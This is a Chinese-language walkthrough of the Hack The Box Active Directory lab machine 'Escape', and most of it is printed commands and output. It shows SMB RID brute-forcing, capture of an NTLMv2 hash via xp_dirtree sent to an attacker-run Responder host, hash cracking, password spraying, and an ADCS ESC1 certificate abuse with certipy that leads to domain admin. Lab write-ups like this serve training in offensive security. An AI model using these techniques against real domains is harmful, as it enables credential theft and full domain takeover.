Tracks-AD-Escape

AD
17k words

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
└─$ sudo nmap -sS 10.10.11.202 -p- --min-rate=2000
[sudo] password for fonllge:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 03:48 EST
Nmap scan report for 10.10.11.202
Host is up (0.18s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49691/tcp open  unknown
49692/tcp open  unknown
49710/tcp open  unknown
49726/tcp open  unknown

└─$ sudo nmap -sU 10.10.11.202 --top-ports=200 --min-rate=6000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-29 03:50 EST
Nmap scan report for 10.10.11.202
Host is up (0.15s latency).
Not shown: 196 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

ldap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
└─$ ldapsearch -x -H ldap://10.10.11.202 -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=sequel,DC=htb
ldapServiceName: sequel.htb:dc$@SEQUEL.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=sequel,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat
 ion,DC=sequel,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=sequel,DC=htb
namingContexts: DC=sequel,DC=htb
namingContexts: CN=Configuration,DC=sequel,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=sequel,DC=htb
namingContexts: DC=DomainDnsZones,DC=sequel,DC=htb
namingContexts: DC=ForestDnsZones,DC=sequel,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 159856
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=sequel,DC=htb
dnsHostName: dc.sequel.htb
defaultNamingContext: DC=sequel,DC=htb
currentTime: 20241229163620.0Z
configurationNamingContext: CN=Configuration,DC=sequel,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1


dc.sequel.htb

to User

smb允许匿名访问,所以可以跑rid

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
└─$ crackmapexec smb 10.10.11.202 -u anonymous -p '' --rid-brute=10000
SMB         10.10.11.202    445    DC               [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.202    445    DC               [+] sequel.htb\anonymous:
SMB         10.10.11.202    445    DC               [+] Brute forcing RIDs
SMB         10.10.11.202    445    DC               498: sequel\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.202    445    DC               500: sequel\Administrator (SidTypeUser)
SMB         10.10.11.202    445    DC               501: sequel\Guest (SidTypeUser)
SMB         10.10.11.202    445    DC               502: sequel\krbtgt (SidTypeUser)
SMB         10.10.11.202    445    DC               512: sequel\Domain Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               513: sequel\Domain Users (SidTypeGroup)
SMB         10.10.11.202    445    DC               514: sequel\Domain Guests (SidTypeGroup)
SMB         10.10.11.202    445    DC               515: sequel\Domain Computers (SidTypeGroup)
SMB         10.10.11.202    445    DC               516: sequel\Domain Controllers (SidTypeGroup)
SMB         10.10.11.202    445    DC               517: sequel\Cert Publishers (SidTypeAlias)
SMB         10.10.11.202    445    DC               518: sequel\Schema Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               519: sequel\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               520: sequel\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.202    445    DC               521: sequel\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.202    445    DC               522: sequel\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.202    445    DC               525: sequel\Protected Users (SidTypeGroup)
SMB         10.10.11.202    445    DC               526: sequel\Key Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               527: sequel\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.202    445    DC               553: sequel\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.202    445    DC               571: sequel\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.202    445    DC               572: sequel\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.202    445    DC               1000: sequel\DC$ (SidTypeUser)
SMB         10.10.11.202    445    DC               1101: sequel\DnsAdmins (SidTypeAlias)
SMB         10.10.11.202    445    DC               1102: sequel\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.202    445    DC               1103: sequel\Tom.Henn (SidTypeUser)
SMB         10.10.11.202    445    DC               1104: sequel\Brandon.Brown (SidTypeUser)
SMB         10.10.11.202    445    DC               1105: sequel\Ryan.Cooper (SidTypeUser)
SMB         10.10.11.202    445    DC               1106: sequel\sql_svc (SidTypeUser)
SMB         10.10.11.202    445    DC               1107: sequel\James.Roberts (SidTypeUser)
SMB         10.10.11.202    445    DC               1108: sequel\Nicole.Thompson (SidTypeUser)
SMB         10.10.11.202    445    DC               1109: sequel\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)

smb中给了一个pdf,末尾有有一个账号密码,允许我们访问mssql

alt text

PublicUser/GuestUserCantWrite1

sudo responder -I tun0

直接连mssql,用dirtree拿ntlmv2的hash回来跑一下试试

1
2
3
4
5
6
7
8
9
10
11
12
└─$ impacket-mssqlclient -dc-ip 10.10.11.202 sequel.htb/'PublicUser':'GuestUserCantWrite1'@10.10.11.202                        
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
                                                                                                                               
[*] Encryption required, switching to TLS                      
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master                                                                  [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english                                                                    
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192                                                                   [*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.             
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.           
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)                                                                           
[!] Press help for extra shell commands

SQL (PublicUser  guest@msdb)> xp_dirtree \\10.10.16.10\a
[%] exec master.sys.xp_dirtree '\\10.10.16.10\a',1,1

收到hash

1
2
3
└─$ sudo responder -I tun0

 sql_svc::sequel:7c386faedcf6e53f:8FB4214CE21CF4AD9D37F827CF0CE884:010100000000000000FA2248EB59DB01C33E717112DBA1BB0000000002000800500037005600470001001E00570049004E002D0039005A0038003500380050004900570039003100410004003400570049004E002D0039005A003800350038005000490057003900310041002E0050003700560047002E004C004F00430041004C000300140050003700560047002E004C004F00430041004C000500140050003700560047002E004C004F00430041004C000700080000FA2248EB59DB0106000400020000000800300030000000000000000000000000300000DCF539F51BC83DF6877DE74ED2B8C1B81C6196A8831D52EFF7EFA387E42DAC490A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00310030000000000000000000

跑出sql_svc的密码REGGIE1234ronnie

1
2
3
4
5
6
7
8
9
10
 └─$ hashcat hash /usr/share/wordlists/rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

5600 | NetNTLMv2 | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

SQL_SVC::sequel:7c386faedcf6e53f:8fb4214ce21cf4ad9d37f827cf0ce884:010100000000000000fa2248eb59db01c33e717112dba1bb0000000002000800500037005600470001001e00570049004e002d0039005a0038003500380050004900570039003100410004003400570049004e002d0039005a003800350038005000490057003900310041002e0050003700560047002e004c004f00430041004c000300140050003700560047002e004c004f00430041004c000500140050003700560047002e004c004f00430041004c000700080000fa2248eb59db0106000400020000000800300030000000000000000000000000300000dcf539f51bc83df6877de74ed2b8c1b81c6196a8831d52eff7efa387e42dac490a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310036002e00310030000000000000000000:REGGIE1234ronnie

验证确定可以使用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ kerbrute passwordspray userlist 'REGGIE1234ronnie' --dc 10.10.11.202 -d sequel.htb 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 12/29/24 - Ronnie Flathers @ropnop

2024/12/29 12:20:16 >  Using KDC(s):
2024/12/29 12:20:16 >   10.10.11.202:88

2024/12/29 12:20:17 >  [+] VALID LOGIN:  sql_svc@sequel.htb:REGGIE1234ronnie
2024/12/29 12:20:17 >  Done! Tested 10 logins (1 successes) in 0.676 seconds

winrm登录后在sqlserver下的log目录当中,存有errorlog的备份

1
2
3
4
5
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK  

2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]

其中可以看到用户Ryan.Cooper用户登录失败后,又紧接着有一个NuclearMosquito3用户登录也失败了,猜测NuclearMosquito3应当是Ryan.Cooper账户的密码。

sequel.htb\Ryan.Cooper NuclearMosquito3

Ryan用户登陆后获得user.txt

to Root

这里如果有新版本的的bloodhound的话遛狗可以看到adcs的相关信息,不过我没有更新到新版本

https://github.com/SpecterOps/BloodHound-Legacy

这里枚举到adcs的时候看到有esc1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
└─$ certipy find -u Ryan.Cooper -p 'NuclearMosquito3' -dc-ip 10.10.11.202 -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'sequel-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sequel-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'sequel-DC-CA'
[*] Saved BloodHound data to '20241229130432_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20241229130432_Certipy.txt'
[*] Saved JSON output to '20241229130432_Certipy.json'
------------------------------------------------------------
└─$ cat 20241229130432_Certipy.txt
Certificate Authorities
  0
    CA Name                             : sequel-DC-CA
    DNS Name                            : dc.sequel.htb
    Certificate Subject                 : CN=sequel-DC-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Certificate Validity Start          : 2022-11-18 20:58:46+00:00
    Certificate Validity End            : 2121-11-18 21:08:46+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : SEQUEL.HTB\Administrators
      Access Rights
        ManageCertificates              : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        ManageCa                        : SEQUEL.HTB\Administrators
                                          SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
        Enroll                          : SEQUEL.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Domain Users
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Administrator
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'SEQUEL.HTB\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication
1
2
3
Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                  SEQUEL.HTB\Domain Users
                                  SEQUEL.HTB\Enterprise Admins

esc1这里不做多阐述,于Authority中有相对详细的描述。

rights包含domain users所以当前Ryan.Cooper用户即可。

1
2
3
4
5
6
7
8
9
└─$ certipy req -u 'Ryan.Cooper' -p 'NuclearMosquito3' -template 'UserAuthentication' -ca 'sequel-DC-CA' -dc-ip 10.10.11.202 -upn 'administrator'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

拿到证书后这里我用passthecert改了下admin的密码,其他的rbcd、加用户、加组都可以,看个人喜好,当时打的时候想pkinit拿nthash,结果机器出问题了,摇htb客服对线了一下,又给修好了,所以补一下这两个。

1.certipy

1
2
3
4
5
6
7
8
9
└─$ certipy auth -pfx ./administrator.pfx -domain sequel.htb  -username administrator                                                                                 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b

2.Rubeus

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
.\Rubeus.exe asktgt /user:administrator /certificate:C:\Users\Ryan.Cooper\Documents\cert.pfx

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::417c:531c:96f6:8294%4:88
....

passthecert部分

1
2
3
4
5
6
7
8
9
└─$ python3 ~/tools/wintools/PassTheCert/Python/passthecert.py -crt administrator.crt -key administrator.key -dc-ip 10.10.11.202 -action ldap-shell -domain sequel.htb
Impacket v0.12.0 - Copyright Fortrhttps://github.com/SpecterOps/BloodHound-Legacya, LLC and its affiliated companies 

Type help for list of commands

# change_password administrator Password@123
Got User DN: CN=Administrator,CN=Users,DC=sequel,DC=htb
Attempting to set new password of: Password@123
Password changed successfully!

直接登陆就好

1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ evil-winrm -u administrator -i 10.10.11.202 -p 'Password@123'                  
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\desktop>        cat r*
bd2ccdfb331f198854b3458a1c0fa547
*Evil-WinRM* PS C:\Users\Administrator\desktop> whoami
sequel\administrator

get Root

没什么好说的,都是基础知识,除了找密码容易看漏之外,整体过于基础了。